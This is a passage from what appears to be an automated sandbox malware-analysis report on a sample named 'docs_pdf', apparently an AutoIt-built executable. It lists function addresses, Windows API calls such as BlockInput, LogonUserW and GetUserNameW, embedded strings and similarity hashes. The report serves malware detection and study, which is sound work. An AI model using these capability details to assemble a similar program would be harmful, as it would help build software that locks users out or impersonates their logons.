                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c2491a5163dc8d85bbf3049c00523b0f7065a8786de7eb69b2990cc907622dcb
                                    • Instruction ID: daa44041652b848dd087351f6d4f890f4d49d495c0db5268f064be19197bd122
                                    • Opcode Fuzzy Hash: c2491a5163dc8d85bbf3049c00523b0f7065a8786de7eb69b2990cc907622dcb
                                    • Instruction Fuzzy Hash: 44B1FD74E6AF418ED22396398961336B64CAFBB2C6B51D71BFC6731D16FB2681834240
                                    Function 01018B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • __time64.LIBCMT ref: 01018B25
                                      • Part of subcall function 00FD543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,010191F8,00000000,?,?,?,?,010193A9,00000000,?), ref: 00FD5443
                                      • Part of subcall function 00FD543A: __aulldiv.LIBCMT ref: 00FD5463
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    • Opcode ID: 35f2e601d53d3123ba0348cb43460f220dc9d9a68ab589d3c38d3f91f960ad66
                                    • Instruction ID: 3adeefe23dee45482a2cc7445ea5ec49eec5e309e4d645cfa4fb6d961db9dcd5
                                    • Opcode Fuzzy Hash: 35f2e601d53d3123ba0348cb43460f220dc9d9a68ab589d3c38d3f91f960ad66
                                    • Instruction Fuzzy Hash: AA21B172A35610CBC729CF29D441A52B3E1EBA5321B288E6DD0E5CB2C4CA79B905CB94
                                    Function 010241FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • BlockInput.USER32(00000001), ref: 01024218
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BlockInput
                                    • String ID:
                                    • API String ID: 3456056419-0
                                    • Opcode ID: af4b4c04c7bb2ad310ea21b85a515c3900f017737c07b5116db11a902c218758
                                    • Instruction ID: 35afacce178d7b63dfb1fcafad1affc5b5596f86f1093b88e5d8ee77185b5fba
                                    • Opcode Fuzzy Hash: af4b4c04c7bb2ad310ea21b85a515c3900f017737c07b5116db11a902c218758
                                    • Instruction Fuzzy Hash: BBE04F712442159FC710EF6AD844A9AFBECAF99760F008016FD8DD7353DAB4E8449BA1
                                    Function 01008C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,010088D1), ref: 01008CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    • Opcode ID: 624c09b0783eb00a9836213dc5724cdb86da994297a4eac2107d77cf3182f3ec
                                    • Instruction ID: 2845407d9db0b3e409ba59a2f82432e17ef5742b7f0bef3124fa1e67cedd19a1
                                    • Opcode Fuzzy Hash: 624c09b0783eb00a9836213dc5724cdb86da994297a4eac2107d77cf3182f3ec
                                    • Instruction Fuzzy Hash: 16D05E3226450EABEF018EA8DC01EAE3B69EB04B01F408111FE15C5090C776D835AF60
                                    Function 00FF2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?), ref: 00FF2242
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: 972a0c3946a2d75561e3f07ee19587cb8d29393acc688df281a0beb027388891
                                    • Instruction ID: 101ef8f3a812ad4b43f77acefa5024f0986e55bfd926829714557898a2886b72
                                    • Opcode Fuzzy Hash: 972a0c3946a2d75561e3f07ee19587cb8d29393acc688df281a0beb027388891
                                    • Instruction Fuzzy Hash: 02C002B1804109DBDB15DA90D5889EAB7BCAB04304F104195A641A2100D6749B449A61
                                    Function 00FDA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FDA36A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 0f906fef6510d2ad785d9f7a095612f8f0a6a1baa7975b1acea722e79e221bad
                                    • Instruction ID: b38d0f33fc710034158459209b1c57c3138aa0f88e1a3fe001782467ac026eb1
                                    • Opcode Fuzzy Hash: 0f906fef6510d2ad785d9f7a095612f8f0a6a1baa7975b1acea722e79e221bad
                                    • Instruction Fuzzy Hash: 24A0243000010DF7CF001F41FC044457F5CD7011D0700C010F40C41011C7F3541047C1
                                    Function 00FC8A0E Relevance: .6, Instructions: 608COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b9e461e0c9526c6c9f3123e4a87fec82be0c342d75ce4e415aaa6b670b5cc04c
                                    • Instruction ID: d6745e36cc228c06cfb016741a707d01174f16ada8af772600bc459c6e8b4d6b
                                    • Opcode Fuzzy Hash: b9e461e0c9526c6c9f3123e4a87fec82be0c342d75ce4e415aaa6b670b5cc04c
                                    • Instruction Fuzzy Hash: 25223930901217DBEF29CA18C9D1B7D7BA1FB45394F24846ED8869B2D1DB349D82EF60
                                    Function 00FD2405 Relevance: .3, Instructions: 345COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction ID: f910cd9ec675c69866f185fbfdb4d69c9dccbe7b4cc83a29c71472aa19bd6715
                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                    • Instruction Fuzzy Hash: 77C1833260515309DB6D8639947413EBBE36AA27B131E0B5FE4B2CB6C5EF20D524F660
                                    Function 00FD283A Relevance: .3, Instructions: 341COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction ID: d89d41788b512d8fd8964d9c2bfd98a9a7733162f4ca85d04d3d4aa0e19ed2fa
                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                    • Instruction Fuzzy Hash: D6C1943260519309DB6D4739947413EBBE36AA27B131E0B6FE4B2DB6C4EF20D524F660
                                    Function 00FD1BB8 Relevance: .3, Instructions: 323COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: 5f2e366d2edf823ce050804c3886bbc54320e37b55714a2eaa89db82b6312d54
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: 68C1623270519319DB2D4739947417EBBE36AA27B131E0B5EE4B2CB6D4EF20D524F610
                                    Function 01027B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 01027B70
                                    • DeleteObject.GDI32(00000000), ref: 01027B82
                                    • DestroyWindow.USER32 ref: 01027B90
                                    • GetDesktopWindow.USER32 ref: 01027BAA
                                    • GetWindowRect.USER32(00000000), ref: 01027BB1
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 01027CF2
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 01027D02
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027D4A
                                    • GetClientRect.USER32(00000000,?), ref: 01027D56
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01027D90
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DB2
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DC5
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DD0
                                    • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DD9
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DE8
                                    • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DF1
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027DF8
                                    • GlobalFree.KERNEL32(00000000), ref: 01027E03
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027E15
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01042CAC,00000000), ref: 01027E2B
                                    • GlobalFree.KERNEL32(00000000), ref: 01027E3B
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01027E61
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01027E80
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01027EA2
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0102808F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2211948467-2373415609
                                    • Opcode ID: f6292bf4184180047b15a8aec236a62deb117212c84a7af0d472528b405ea030
                                    • Instruction ID: 61557f81ed56a75cd2a685fdb4a3a83648b363c2c5bda9ac371a9932e2ee8d56
                                    • Opcode Fuzzy Hash: f6292bf4184180047b15a8aec236a62deb117212c84a7af0d472528b405ea030
                                    • Instruction Fuzzy Hash: E0028F71900119EFDB24DFA8CC89EAE7BB9FB48310F148159FA45AB295CB75AD01CF60
                                    Function 010337F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,0103F910), ref: 010338AF
                                    • IsWindowVisible.USER32(?), ref: 010338D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharUpperVisibleWindow
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 4105515805-45149045
                                    • Opcode ID: d4257cff2c2e9b5248abb74e38726b5be623e3a7102bec05884dddde029fe1f9
                                    • Instruction ID: 449bc2692965a23e6e585448c002b9be082c3fad7fc85ba3c36e81416128b5e8
                                    • Opcode Fuzzy Hash: d4257cff2c2e9b5248abb74e38726b5be623e3a7102bec05884dddde029fe1f9
                                    • Instruction Fuzzy Hash: DFD160702043069BDB14EF25C891AAE7BEABF94354F044459B9C69F3E2CF35E90ACB41
                                    Function 0103A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 0103A89F
                                    • GetSysColorBrush.USER32(0000000F), ref: 0103A8D0
                                    • GetSysColor.USER32(0000000F), ref: 0103A8DC
                                    • SetBkColor.GDI32(?,000000FF), ref: 0103A8F6
                                    • SelectObject.GDI32(?,?), ref: 0103A905
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0103A930
                                    • GetSysColor.USER32(00000010), ref: 0103A938
                                    • CreateSolidBrush.GDI32(00000000), ref: 0103A93F
                                    • FrameRect.USER32(?,?,00000000), ref: 0103A94E
                                    • DeleteObject.GDI32(00000000), ref: 0103A955
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0103A9A0
                                    • FillRect.USER32(?,?,?), ref: 0103A9D2
                                    • GetWindowLongW.USER32(?,000000F0), ref: 0103A9FD
                                      • Part of subcall function 0103AB60: GetSysColor.USER32(00000012), ref: 0103AB99
                                      • Part of subcall function 0103AB60: SetTextColor.GDI32(?,?), ref: 0103AB9D
                                      • Part of subcall function 0103AB60: GetSysColorBrush.USER32(0000000F), ref: 0103ABB3
                                      • Part of subcall function 0103AB60: GetSysColor.USER32(0000000F), ref: 0103ABBE
                                      • Part of subcall function 0103AB60: GetSysColor.USER32(00000011), ref: 0103ABDB
                                      • Part of subcall function 0103AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0103ABE9
                                      • Part of subcall function 0103AB60: SelectObject.GDI32(?,00000000), ref: 0103ABFA
                                      • Part of subcall function 0103AB60: SetBkColor.GDI32(?,00000000), ref: 0103AC03
                                      • Part of subcall function 0103AB60: SelectObject.GDI32(?,?), ref: 0103AC10
                                      • Part of subcall function 0103AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0103AC2F
                                      • Part of subcall function 0103AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0103AC46
                                      • Part of subcall function 0103AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0103AC5B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    • Opcode ID: bb648d710f08b852bc663dd4d3b4b57db4909f40797b5a4a00981956b43c9692
                                    • Instruction ID: bf9211890c890488d6b96ceadeb500b0f6008cd6ff8b1662ec8f5f6466015a4d
                                    • Opcode Fuzzy Hash: bb648d710f08b852bc663dd4d3b4b57db4909f40797b5a4a00981956b43c9692
                                    • Instruction Fuzzy Hash: 19A16D72508302FFD7219F64DC08A5BBBADFB89321F004A1AFAE2D61D1D77A94458B52
                                    Function 00FB2C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(?,?,?), ref: 00FB2CA2
                                    • DeleteObject.GDI32(00000000), ref: 00FB2CE8
                                    • DeleteObject.GDI32(00000000), ref: 00FB2CF3
                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00FB2CFE
                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00FB2D09
                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00FEC68B
                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FEC6C4
                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FECAED
                                      • Part of subcall function 00FB1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FB2036,?,00000000,?,?,?,?,00FB16CB,00000000,?), ref: 00FB1B9A
                                    • SendMessageW.USER32(?,00001053), ref: 00FECB2A
                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FECB41
                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FECB57
                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FECB62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                    • String ID: 0
                                    • API String ID: 464785882-4108050209
                                    • Opcode ID: 310e3b2ff99d5fd33dc831aee1fe336698f1e0a669c341d036cc4e97c0592882
                                    • Instruction ID: 54311ae28b4899e05760f0511dcc6c8ed889a8b9fcd8dfbb22d476fb113f01eb
                                    • Opcode Fuzzy Hash: 310e3b2ff99d5fd33dc831aee1fe336698f1e0a669c341d036cc4e97c0592882
                                    • Instruction Fuzzy Hash: 4E12BE70A00242EFCB65CF26C884BA9BBE5BF45320F544569F985DB262C735EC42EF91
                                    Function 010277BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 010277F1
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 010278B0
                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010278EE
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 01027900
                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01027946
                                    • GetClientRect.USER32(00000000,?), ref: 01027952
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01027996
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 010279A5
                                    • GetStockObject.GDI32(00000011), ref: 010279B5
                                    • SelectObject.GDI32(00000000,00000000), ref: 010279B9
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010279C9
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010279D2
                                    • DeleteDC.GDI32(00000000), ref: 010279DB
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 01027A07
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 01027A1E
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01027A59
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 01027A6D
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 01027A7E
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 01027AAE
                                    • GetStockObject.GDI32(00000011), ref: 01027AB9
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 01027AC4
